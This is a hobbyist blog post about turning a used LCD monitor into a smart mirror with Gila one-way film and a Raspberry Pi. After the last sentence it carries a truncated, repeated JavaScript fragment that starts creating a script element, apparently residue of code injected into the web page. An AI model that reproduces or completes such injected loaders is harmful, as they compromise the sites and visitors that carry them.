Preparing The Display
My first step in the project was to prepare the display with the mirror film. Here is the display and all of the tools I required.
After locating everything I needed I made sure to clean the display to remove any dirt and stains from the LCD panel as it was used prior as a monitor. I also made sure to wipe it down with a reduced lint cloth to sure there was virtually no dirt or dust on the display.
I do not have any photos of the application process, however if you have any questions about that please feel free to reach out to me.
I will say that installing the film is not as easy as the Gila video tutorial makes it out to be, but it’s not impossible and after doing several of these I’m sure to master it. If you are also easily frustrated I do not recommend going the film route and you purchase a premade acrylic one-way mirror.
However because I ultimately want the finished product to have a glass finish and I want to ensure all the layers are adhered together to make it a solid piece to provide the best mirror and display quality I am going through the motions even on this proof of concept device.
Here is the display after the application of the film, please ignore my feet. When taking pictures I initially did not put 2 + 2 together to compute that this monitor was now a mirror.
Since the Gila application process creates a lot of moisture and this was applied directly to the LCD I let it dry for some time before connecting it to a power source as fireworks was not the goal here.
Here is the display showing some simple text to ensure that it worked after the film had been applied.
Now the display tested well and was functioning, I took a few moments to prepare the Raspberry Pi and put a simple software app on it to run similar interface to the already existing Magic Mirrors.
This is all for today and my next posting will have better quality photos as well as cover the framing process.
My framed version is also going to include several exciting features so please stay tuned!var d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);